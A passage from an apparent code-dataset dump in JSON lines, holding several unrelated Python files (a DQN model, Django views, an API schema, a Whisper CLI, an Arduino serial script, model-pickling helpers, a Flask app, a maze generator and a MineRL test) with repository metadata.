self.target_model.load_state_dict(self.policy_model.state_dict())\n\n return loss\n\n", "repo_name": "YSLIU627/ML-project-2020", "sub_path": "gaby_version/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 5716, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.cuda.is_available", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 21, "usage_type": "call"}, {"api_name": "utils.Uint2Float", "line_number": 25, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 35, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.optim.RMSprop", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 70, "usage_type": "attribute"}, {"api_name": "utils.WarpFrame", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 79, "usage_type": "call"}, {"api_name": "utils.FrameStack", "line_number": 86, "usage_type": "call"}, {"api_name": "random.random", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 127, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 133, "usage_type": "call"}]} +{"seq_id": "38556360396", "text": "from django.shortcuts import render\nfrom .models import *\nfrom apps.homepage.models import *\n\ndef project(request):\n projects = Projects.objects.all()\n category = Category.objects.all()\n settings = Settings.objects.latest('id')\n context = {\n 'projects': projects,\n 'category': category,\n 'settings': settings,\n 'home': 'Главная',\n 'next': 'Проекты'\n }\n return render(request, 'projects/project.html', context)\n\ndef single_project(request, slug):\n projects = Projects.objects.get(slug=slug)\n images = ProjectImages.objects.filter(project = projects)\n settings = Settings.objects.latest('id')\n context = {\n 'projects': projects,\n 'settings': settings,\n 'images': images,\n 'home': 'Главная',\n 'next': 'Детали проекта'\n }\n return render(request, 'projects/project-details.html', context)\n \n\n", "repo_name": "Tazabek/construction", "sub_path": "apps/project/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 930, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "28037935940", "text": "from textwrap import dedent\n\nfrom rest_framework.schemas.openapi import AutoSchema\n\nfrom ._errors import error_responses\nfrom ._message import message_with_id_schema\n\n\nclass SaveAlgorithmManifestSchema(AutoSchema):\n def get_operation(self, path, method):\n operation = super().get_operation(path, method)\n if method == \"POST\":\n operation[\"operationId\"] = \"SaveAlgorithmManifest\"\n operation[\"tags\"] = [\"Tator\"]\n return operation\n\n def get_description(self, path, method):\n return dedent(\n \"\"\"\\\n Saves an uploaded algorithm manifest to the desired project. It is expected this manifest\n corresponds with an algorithm workflow to be registered by another endpoint.\n\n Manifest is uploaded via tus, a separate mechanism from the REST API. Once a manifest\n upload is complete (a .yaml file), the file must be saved to the database using\n this endpoint.\n \"\"\"\n )\n\n def get_path_parameters(self, path, method):\n return [\n {\n \"name\": \"project\",\n \"in\": \"path\",\n \"required\": True,\n \"description\": \"A unique integer identifying a project\",\n \"schema\": {\"type\": \"integer\"},\n }\n ]\n\n def get_filter_parameters(self, path, method):\n return []\n\n def get_request_body(self, path, method):\n body = {}\n if method == \"POST\":\n body = {\n \"required\": True,\n \"content\": {\n \"application/json\": {\n \"schema\": {\"$ref\": \"#/components/schemas/AlgorithmManifestSpec\"},\n }\n },\n }\n\n return body\n\n def get_responses(self, path, method):\n responses = error_responses()\n if method == \"POST\":\n responses[\"201\"] = {\n \"description\": \"Successful save of algortihm manifest.\",\n \"content\": {\n \"application/json\": {\n \"schema\": {\n \"$ref\": \"#/components/schemas/AlgorithmManifest\",\n }\n }\n },\n }\n return responses\n", "repo_name": "cvisionai/tator", "sub_path": "api/main/schema/save_algorithm_manifest.py", "file_name": "save_algorithm_manifest.py", "file_ext": "py", "file_size_in_byte": 2254, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 88, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.schemas.openapi.AutoSchema", "line_number": 9, "usage_type": "name"}, {"api_name": "textwrap.dedent", "line_number": 18, "usage_type": "call"}, {"api_name": "_errors.error_responses", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "73016625124", "text": "import argparse\nfrom whisper_spln.parserTasks import clearLogs, getLogs, getQueue, runWhisper\n\n\ndef main():\n parser = argparse.ArgumentParser(\n prog='AudioToText',\n description='Converts an audio file to text file.',\n epilog='Made for SPLN 2022/2023'\n )\n\n # Add arguments\n parser.add_argument('input_file', type=str,\n help='Path to the file with the audio')\n parser.add_argument('-d', '--dest', type=str, default='result.txt',\n help='Path for the output file')\n parser.add_argument('-il', '--inputLang', type=str,\n help='Language of the input file')\n parser.add_argument('-ol', '--outputLang', type=str,\n help='Language of the output text')\n parser.add_argument('-q', '--queue', action=QueueAction,\n help='Show the audio conversion queue')\n parser.add_argument('-l', '--logs', action=LogsAction,\n help='Show the execution logs')\n parser.add_argument('-cl', '--clearLogs', action=ClearLogsAction,\n help='Clear logs')\n # Parse the command-line arguments\n args = parser.parse_args()\n # Access the values of the arguments\n input_file = args.input_file\n dest_folder = args.dest\n inputLang = args.inputLang\n outputLang = args.outputLang\n\n runWhisper(input_file, dest_folder, inputLang, outputLang)\n\n\nclass QueueAction(argparse.Action):\n def __init__(self, option_strings, dest, **kwargs):\n return super().__init__(option_strings, dest, nargs=0, default=argparse.SUPPRESS, **kwargs)\n\n def __call__(self, parser, namespace, values, option_string, **kwargs):\n getQueue()\n parser.exit()\n\n\nclass LogsAction(argparse.Action):\n def __init__(self, option_strings, dest, **kwargs):\n return super().__init__(option_strings, dest, nargs=0, default=argparse.SUPPRESS, **kwargs)\n\n def __call__(self, parser, namespace, values, option_string, **kwargs):\n getLogs()\n parser.exit()\n\n\nclass ClearLogsAction(argparse.Action):\n def __init__(self, option_strings, dest, **kwargs):\n return super().__init__(option_strings, dest, nargs=0, default=argparse.SUPPRESS, **kwargs)\n\n def __call__(self, parser, namespace, values, option_string, **kwargs):\n clearLogs()\n parser.exit()\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "LCMJ21/Whisper", "sub_path": "whisper_spln/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2407, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 6, "usage_type": "call"}, {"api_name": "whisper_spln.parserTasks.runWhisper", "line_number": 35, "usage_type": "call"}, {"api_name": "argparse.Action", "line_number": 38, "usage_type": "attribute"}, {"api_name": "argparse.SUPPRESS", "line_number": 40, "usage_type": "attribute"}, {"api_name": "whisper_spln.parserTasks.getQueue", "line_number": 43, "usage_type": "call"}, {"api_name": "argparse.Action", "line_number": 47, "usage_type": "attribute"}, {"api_name": "argparse.SUPPRESS", "line_number": 49, "usage_type": "attribute"}, {"api_name": "whisper_spln.parserTasks.getLogs", "line_number": 52, "usage_type": "call"}, {"api_name": "argparse.Action", "line_number": 56, "usage_type": "attribute"}, {"api_name": "argparse.SUPPRESS", "line_number": 58, "usage_type": "attribute"}, {"api_name": "whisper_spln.parserTasks.clearLogs", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "42734296241", "text": "'''\r\n Arduino waits for 0\r\n 1-Start\r\n 2-Stop\r\n'''\r\n\r\nimport serial\r\nimport time\r\n\r\n\r\nCOM_port = 'COM9'\r\nbaudRate = 9600\r\ncommand_start = '1'\r\ncommand_stop = '2'\r\ncomputer_acknowledgement = '0'\r\narduino_acknowledgement = '0'\r\n\r\n\r\n\r\ndef main():\r\n s = serial.Serial(COM_port, baudRate)\r\n print(\"Connected to port : \" + s.portstr)\r\n time.sleep(1)\r\n s.write(computer_acknowledgement.encode())\r\n time.sleep(1)\r\n rec = s.readline()\r\n print(rec.decode())\r\n ch = '0'\r\n while ch != '3' :\r\n print(\"1-Start\\n2-Stop\\n3-Exit\\nChoice = \")\r\n ch = input()\r\n if ch == '1' :\r\n s.write(command_start.encode())\r\n time.sleep(1)\r\n rec1 = s.readline()\r\n print(rec1.decode())\r\n elif ch == '2' :\r\n s.write(command_stop.encode())\r\n time.sleep(1)\r\n rec2 = s.readline()\r\n print(rec2.decode())\r\n elif ch == '3' :\r\n s.close()\r\n print(\"Port Closed\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n", "repo_name": "suheldeep97/ThrusterComm", "sub_path": "ComputerCOM_Code_Basic.py", "file_name": "ComputerCOM_Code_Basic.py", "file_ext": "py", "file_size_in_byte": 1044, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "serial.Serial", "line_number": 21, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 23, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 25, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 34, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "7608816836", "text": "import copy\nimport time\nfrom collections import Counter, defaultdict\n\nfrom panaxea.core.Model import Model\nfrom panaxea.core.Steppables import Helper\n\ntry:\n import cPickle as pickle\nexcept ImportError:\n import pickle\n\n\nclass AgentSummary(Helper, object):\n \"\"\"\n Helper class which, in the epilogue of each epoch, returns a summary of\n the count of agents belonging to each class\n considering the union of the schedule and agentsToSchedule.\n\n Attributes\n ----------\n recordEvery : int, optional\n Defines every how many epochs an agent summary is returned. Defaults\n to 1. (Ie: Every epoch)\n \"\"\"\n\n def __init__(self, record_every=1):\n self.agentSummary = []\n self.recordEvery = record_every\n\n def step_epilogue(self, model):\n \"\"\"\n Builds a summary of number of agents per agent class in the model.\n\n Parameters\n ----------\n model : Model\n An instance of the model on which the current simulation is based.\n\n Returns\n -------\n Counter\n A counter object where keys correspond to agent classes and\n values to agent counts.\n \"\"\"\n if model.current_epoch % self.recordEvery == 0:\n c = Counter([a.__class__.__name__ for a in\n model.schedule.agents.union(\n model.schedule.agents_to_schedule)])\n self.agentSummary.append(c)\n\n return c\n\n\nclass ModelPickler(Helper, object):\n \"\"\"\n At each epoch, outputs a serialized copy of the model in its current state.\n\n Attributes\n ----------\n outDir : string\n The directory where pickle files should be outputted. This should be\n specified as relative to the script\n from which the simulation is launched\n \"\"\"\n\n def __init__(self, out_dir):\n self.outDir = out_dir\n\n def step_epilogue(self, model):\n \"\"\"\n Creates and saves the pickle file.\n\n model : Model\n An instance of the model on which the current simulation is based.\n \"\"\"\n with open(\"%s/epoch_%s.pickle\" % (self.outDir, model.current_epoch),\n \"wb\") as output_file:\n pickle.dump(model, output_file)\n\n\nclass ModelPicklerLite(Helper, object):\n \"\"\"\n Creates a lighter version of the pickle allowing to include or exclude\n specific elements.\n\n Attributes\n ----------\n outDir : string\n The directory where pickle files should be outputted. This should be\n specified as relative to the script\n from which the simulation is launched\n prefix : string, optional\n A prefix that will be given to the name of each output file. Eg: For\n a prefix \"my_model\" a sample output\n file would be my_model_epoch_0.pickle Defaults to None\n pickleEvery: number, optional\n Determines the frequency of model serializing. A value of 1 will\n create one pickle per epoch, a value of 2\n will create a pickle every other epoch, etc. Defaults to 1.\n pickleSchedule : bool, optional\n If set to true, the schedule object will be included. This will also\n include all agents on the schedule.\n Defaults to false.\n pickleEnvs : bool, optional\n If set to true, all environment objects will be included. This also\n includes all agents in every environment.\n Defaults to false.\n \"\"\"\n\n # If virtualPickle is set to true the modelLite will be returned rather\n # than pickled\n # pickleEvery means model with pickled every x epochs, defaults to 1\n def __init__(self, out_dir, prefix=None, pickle_every=1,\n pickle_schedule=False, pickle_envs=False):\n self.out_dir = out_dir\n self.pickle_every = pickle_every\n self.prefix = prefix\n self.pickle_schedule = pickle_schedule\n self.pickle_envs = pickle_envs\n\n # It is important this is in the epilogue as we check for an exit flag\n # which is set by helpers in the prologue!\n def step_epilogue(self, model):\n \"\"\"\n Makes a call to the pickleModel method. No special logic here,\n just delegating to the method.\n\n Parameters\n ----------\n model : Model\n An instance of the model on which the current simulation is based.\n \"\"\"\n\n if model.current_epoch > 0 and (\n model.current_epoch % self.pickle_every == 0 or\n model.current_epoch == model.epochs - 1 or model.exit):\n self.pickle_model(model)\n\n def pickle_model(self, model):\n \"\"\"\n Creates and serializes the pickleLight object based on previously\n defined properties.\n\n Parameters\n ----------\n model : Model\n An instance of the model on which the current simulation is based.\n \"\"\"\n start = time.time()\n model_lite = Model(5)\n\n if self.pickle_schedule:\n model_lite.schedule.agents = model.schedule.agents.union(\n model.schedule.agents_to_schedule)\n\n for a in model_lite.schedule.agents:\n if a.__class__.__name__ == \"CancerCell\":\n # Can't pickle functions\n a.reactToDrug_ = None\n\n model_lite.schedule.helpers = [h for h in model.schedule.helpers if\n h.__class__.__name__ not in\n \"ExitConditionWatcher\"]\n\n if self.pickle_envs:\n model_lite.environments = copy.deepcopy(model.environments)\n env_start = time.time()\n for k, v in model_lite.environments.iteritems():\n v.grid = dict(v.grid)\n env_end = time.time()\n print(\"Cloning environments took %s seconds\" % str(\n env_end - env_start))\n\n model_lite.output = model.output\n\n model_lite.properties = model.properties\n # Can't pickle functions\n model_lite.properties[\"agents\"][\"cancerCells\"][\n \"drugReactFunction\"] = None\n model_lite.current_epoch = model.current_epoch\n\n if self.prefix is None:\n target = \"%s/epoch_%s.pickle\" % (self.out_dir, model.current_epoch)\n else:\n target = \"%s/%s_epoch_%s.pickle\" % (\n self.out_dir, self.prefix, model.current_epoch)\n with open(target, \"wb\") as output_file:\n pickle.dump(model_lite, output_file)\n end = time.time()\n print(\"Pickler lite took %s seconds\" % str(end - start))\n\n\ndef depickle_from_lite(pickle_path):\n \"\"\"\n Given a path to a pickle light file, recreates the corresponding object\n with all available properties\n\n This is **not** a helper and **should not be added to the schedule**. It\n is useful to recreate (partial)\n model objects.\n\n This model may or may not be runnable when recreated depending on\n whether all properties (schedule, environments...)\n were retained.\n\n Parameters\n ----------\n pickle_path : string\n The path to the pickle file relative to where the function is being\n called from.\n\n Returns\n -------\n Model\n A (potentially incomplete) instance of a model derived from the\n pickle file.\n \"\"\"\n try:\n with open(pickle_path, 'rb') as f:\n model = pickle.load(f, encoding='latin1')\n except TypeError:\n with open(pickle_path, 'rb') as f:\n model = pickle.load(f)\n\n # Handling both Python 2 and 3\n\n environment_keys = model.environments.keys()\n\n for environment_key in environment_keys:\n environment = model.environments[environment_key]\n\n if \"ObjectGrid\" in environment.__class__.__name__:\n model.environments[environment_key].grid = \\\n defaultdict(set, environment.grid)\n else:\n model.environments[environment_key].grid = \\\n defaultdict(int, environment.grid)\n return model\n", "repo_name": "DarioPanada/panaxea", "sub_path": "panaxea/toolkit/Toolkit.py", "file_name": "Toolkit.py", "file_ext": "py", "file_size_in_byte": 7985, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "panaxea.core.Steppables.Helper", "line_number": 14, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 47, "usage_type": "call"}, {"api_name": "panaxea.core.Steppables.Helper", "line_number": 55, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 79, "usage_type": "call"}, {"api_name": "panaxea.core.Steppables.Helper", "line_number": 82, "usage_type": "name"}, {"api_name": "time.time", "line_number": 150, "usage_type": "call"}, {"api_name": "panaxea.core.Model.Model", "line_number": 151, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 167, "usage_type": "call"}, {"api_name": "time.time", "line_number": 168, "usage_type": "call"}, {"api_name": "time.time", "line_number": 171, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 189, "usage_type": "call"}, {"api_name": "time.time", "line_number": 190, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 221, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 224, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 235, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 238, "usage_type": "call"}]} +{"seq_id": "9211715294", "text": "from flask import Flask,request,jsonify,render_template\nfrom flask_cors import *\n\nfrom util import process_source, get_ast\nfrom CCGIR import Retrieval\n\nccgir = Retrieval()\n\nprint(\"Sentences to vectors\")\nccgir.encode_file()\n\nprint(\"加载索引\")\nccgir.build_index(n_list=1)\nccgir.index.nprob = 1\n\napp = Flask(__name__)\napp.config['JSON_AS_ASCII'] = False\nCORS(app, supports_credentials=True)\n\nfrom flask.json import JSONEncoder as _JSONEncoder\n\nclass JSONEncoder(_JSONEncoder):\n def default(self, o):\n import decimal\n if isinstance(o, decimal.Decimal):\n return float(o)\n super(JSONEncoder, self).default(o)\napp.json_encoder = JSONEncoder\n\n@app.route('/predict',methods=['GET'])\ndef predict():\n origin_code = str(request.args['code'])\n code = process_source(origin_code)\n ast = get_ast(origin_code)\n sim_code, sim_ast, sim_nl = ccgir.single_query(code, ast, topK=5)\n result = {'nl':sim_nl}\n return jsonify(result)\n\n@app.route('/index', methods=[\"GET\"])\ndef index():\n return render_template('index.html')\n\nif __name__ == '__main__':\n app.run()\n", "repo_name": "NTDXYG/CCGIR", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1101, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "52", "api": [{"api_name": "CCGIR.Retrieval", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.json.JSONEncoder", "line_number": 22, "usage_type": "name"}, {"api_name": "decimal.Decimal", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.request.args", "line_number": 32, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 32, "usage_type": "name"}, {"api_name": "util.process_source", "line_number": 33, "usage_type": "call"}, {"api_name": "util.get_ast", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "12318086861", "text": "import os\nimport random\nimport colorama\nfrom colorama import Back\nfrom .cell import Cell\n\n\nWALL_PAIRS = {\n \"N\": \"S\",\n \"S\": \"N\",\n \"E\": \"W\",\n \"W\": \"E\"\n}\n\n\ndef remove_wall_for_adjacent_cells(cell_1: Cell, cell_2: Cell, wall: str) -> None:\n # since one wall can be associated with 2 cells, we must remove it from both\n cell_1.remove_wall(wall)\n cell_2.remove_wall(WALL_PAIRS[wall])\n\n\nclass Maze():\n\n def __init__(self, n: int, m: int, x_start=0, y_start=0) -> None:\n self.rows_num = n\n self.columns_num = m\n self.x_start = x_start\n self.y_start = y_start\n # create an initial \"maze\" where all the cells are surrounded by walls\n self.maze_map = [[Cell(x, y) for y in range(m)] for x in range(n)]\n\n def get_cell(self, x: int, y: int) -> Cell:\n return self.maze_map[x][y]\n\n def get_unvisited_neighbours(self, cell: Cell) -> list[tuple[str, Cell]]:\n \"\"\"\n Checks all adjacent cell if they were visited: if cell has all 4 walls\n that mean that it wasn't added to any paths in maze. Returns a list of\n tuples with directions to adjacent unvisited cells and cells itself.\n \"\"\"\n delta = [('W', (-1, 0)),\n ('E', (1, 0)),\n ('S', (0, 1)),\n ('N', (0, -1))]\n neighbours = list()\n for direction, (delta_x, delta_y) in delta:\n x = cell.x + delta_x\n y = cell.y + delta_y\n if 0 <= x < self.rows_num and 0 <= y < self.columns_num:\n neighbour = self.get_cell(x, y)\n if neighbour.walled_aroud:\n neighbours.append((direction, neighbour))\n return neighbours\n\n def generate_maze(self) -> None:\n \"\"\" Maze generator \"\"\"\n total_cells_num = self.rows_num * self.columns_num\n # stack of cell which are going to be processed\n stack = list()\n current_cell = self.get_cell(self.x_start, self.y_start)\n visited_num = 1\n # while there is unvisited cells in maze map\n while visited_num < total_cells_num:\n neighbours = self.get_unvisited_neighbours(current_cell)\n # if no unvisited neighbours than this cell was processed\n if not neighbours:\n current_cell = stack.pop()\n continue\n # random selection of the next cell to process\n direction, next_cell = random.choice(neighbours)\n # remove walls for path\n remove_wall_for_adjacent_cells(current_cell, next_cell, direction)\n # add cell to stack for processing\n stack.append(current_cell)\n current_cell = next_cell\n visited_num += 1\n\n def show(self) -> None:\n \"\"\" Print eye-friendly maze \"\"\"\n colorama.init(autoreset=True)\n print(\"\".join([f\"{Back.RED} \" * (self.rows_num * 2 + 1)]))\n for y in range(self.columns_num):\n row = [f\"{Back.RED} \"]\n for x in range(self.rows_num):\n if self.maze_map[x][y].walls[\"E\"]:\n row.append(f\"{Back.GREEN} {Back.RED} \")\n else:\n row.append(f\"{Back.GREEN} \")\n print((\"\".join(row)))\n row = [f\"{Back.RED} \"]\n for x in range(self.rows_num):\n if self.maze_map[x][y].walls[\"S\"]:\n row.append(f\"{Back.RED} \")\n else:\n row.append(f\"{Back.GREEN} {Back.RED} \")\n print((\"\".join(row)))\n\n def write_svg(self):\n \"\"\" Save maze as .svg image\"\"\"\n # create dir for mazes\n if not os.path.exists(\"Mazes\"):\n os.mkdir(\"Mazes\")\n # if there is a maze of the same size, remove it\n filepath = f\"Mazes/{self.rows_num}x{self.columns_num}.svg\"\n if os.path.exists(filepath):\n os.remove(filepath)\n\n aspect_ratio = self.rows_num / self.columns_num\n # padding around maze\n padding = 10\n # height and width of the maze image in pixels (without padding)\n height = 500\n width = int(height * aspect_ratio)\n # scaling factors mapping maze coordinates to image coordinates\n scy, scx = height / self.columns_num, width / self.rows_num\n\n def write_wall(ww_f, ww_x1, ww_y1, ww_x2, ww_y2):\n \"\"\"Write a single wall to the SVG image file handle f.\"\"\"\n print(\n f'<line x1=\"{ww_x1}\" y1=\"{ww_y1}\" x2=\"{ww_x2}\" y2=\"{ww_y2}\"/>', file=ww_f)\n\n # write the .svg image file for maze\n with open(filepath, 'w') as f:\n print('<?xml version=\"1.0\" encoding=\"utf-8\"?>', file=f)\n print('<svg xmlns=\"http://www.w3.org/2000/svg\"', file=f)\n print(' xmlns:xlink=\"http://www.w3.org/1999/xlink\"', file=f)\n print(f' width=\"{width + 2 * padding}\" height=\"{height + 2 * padding}\" viewBox=\"{-padding} {-padding} {width + 2 * padding} {height + 2 * padding}\">', file=f)\n print('<defs>\\n<style type=\"text/css\"><![CDATA[', file=f)\n print('line {', file=f)\n print(' stroke: #000000;\\n stroke-linecap: square;', file=f)\n print(' stroke-width: 5;\\n}', file=f)\n print(']]></style>\\n</defs>', file=f)\n # draw the \"South\" and \"East\" walls of each cell, if present (these\n # are the \"North\" and \"West\" walls of a neighbouring cell in\n # general, of course).\n for x in range(self.rows_num):\n for y in range(self.columns_num):\n if self.get_cell(x, y).walls['S']:\n x1, y1, x2, y2 = x * \\\n scx, (y + 1) * scy, (x + 1) * scx, (y + 1) * scy\n write_wall(f, x1, y1, x2, y2)\n if self.get_cell(x, y).walls['E']:\n x1, y1, x2, y2 = (x + 1) * scx, y * \\\n scy, (x + 1) * scx, (y + 1) * scy\n write_wall(f, x1, y1, x2, y2)\n # draw the North and West maze border, which won't have been drawn\n # by the procedure above.\n print(f'<line x1=\"0\" y1=\"0\" x2=\"{width}\" y2=\"0\"/>', file=f)\n print(f'<line x1=\"0\" y1=\"0\" x2=\"0\" y2=\"{height}\"/>', file=f)\n print('</svg>', file=f)\n\n def get_maze_as_boolean_matrix(self) -> list[list[bool]]:\n matrix= [[1] * (self.rows_num * 2 + 1)]\n \n for y in range(self.columns_num):\n row = [1]\n for x in range(self.rows_num):\n if self.maze_map[x][y].walls[\"E\"]:\n row.append(0)\n row.append(1)\n else:\n row.append(0)\n row.append(0)\n matrix.append(row)\n row = [1]\n for x in range(self.rows_num):\n if self.maze_map[x][y].walls[\"S\"]:\n row.append(1)\n row.append(1)\n else:\n row.append(0)\n row.append(1)\n matrix.append(row)\n \n return matrix\n", "repo_name": "antonKorobenko/maze-generator", "sub_path": "maze_generator/maze.py", "file_name": "maze.py", "file_ext": "py", "file_size_in_byte": 7117, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cell.Cell", "line_number": 16, "usage_type": "name"}, {"api_name": "cell.Cell", "line_number": 30, "usage_type": "call"}, {"api_name": "cell.Cell", "line_number": 32, "usage_type": "name"}, {"api_name": "cell.Cell", "line_number": 35, "usage_type": "name"}, {"api_name": "cell.x", "line_number": 47, "usage_type": "attribute"}, {"api_name": "cell.y", "line_number": 48, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 70, "usage_type": "call"}, {"api_name": "colorama.init", "line_number": 80, "usage_type": "call"}, {"api_name": "colorama.Back.RED", "line_number": 81, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 81, "usage_type": "name"}, {"api_name": "colorama.Back.RED", "line_number": 83, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 83, "usage_type": "name"}, {"api_name": "colorama.Back.GREEN", "line_number": 86, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 86, "usage_type": "name"}, {"api_name": "colorama.Back.RED", "line_number": 86, "usage_type": "attribute"}, {"api_name": "colorama.Back.GREEN", "line_number": 88, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 88, "usage_type": "name"}, {"api_name": "colorama.Back.RED", "line_number": 90, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 90, "usage_type": "name"}, {"api_name": "colorama.Back.RED", "line_number": 93, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 93, "usage_type": "name"}, {"api_name": "colorama.Back.GREEN", "line_number": 95, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 95, "usage_type": "name"}, {"api_name": "colorama.Back.RED", "line_number": 95, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "8084258293", "text": "\"\"\"To launch this test do the following.\n\n1. Launch Pyro4-ns\n\n pyro4-ns\n\n2. Launch the instance manager\n\npython3 -c \"from ai_crowd_specified_seed_test import lim; lim()\" --seeding_type=3 --seeds 1,1,1;2,2,2\n\n3. Run the test.\n\npython3 -m ai_crowd_specified_seed_test\n\"\"\"\n\nimport os\nimport subprocess\nimport io\n\nimport time\nimport threading\nimport Pyro4\n\n\ndef launch_ns():\n \"\"\"Launches the pyro4-ns if it doesn't already exist.\n\n Returns the process.\n \"\"\"\n return subprocess.Popen([\"pyro4-ns\"], shell=False)\n\n\ndef launch_im():\n return subprocess.Popen(\n 'python3 scripts/launch_instance_manager.py --seeding_type=3 --seeds=1,1,1,1;2,2,2,2'.split(' '), shell=False)\n\n\ndef main():\n \"\"\"Tests multi-instance seeding.\n \"\"\"\n # try:\n # # 1. Launch the pyro4-ns if it doesn't exist\n # ns =launch_ns()\n # print(\"launched!\")\n # time.sleep(1)\n # im = launch_im()\n # time.sleep(2)\n\n # envs = []\n\n import gym\n os.environ['MINERL_INSTANCE_MANAGER_REMOTE'] = '1'\n import minerl\n\n def run_env():\n try:\n env = gym.make('MineRLNavigateDense-v0')\n except Exception as e:\n print(\"Pyro traceback:\")\n print(\"\".join(Pyro4.util.getPyroTraceback()))\n raise e\n\n for _ in range(3):\n env.reset()\n for _ in range(100):\n env.step(env.action_space.no_op())\n # env.render()\n\n thrs = [threading.Thread(target=run_env) for _ in range(2)]\n for t in thrs:\n time.sleep(1)\n t.start()\n\n for t in 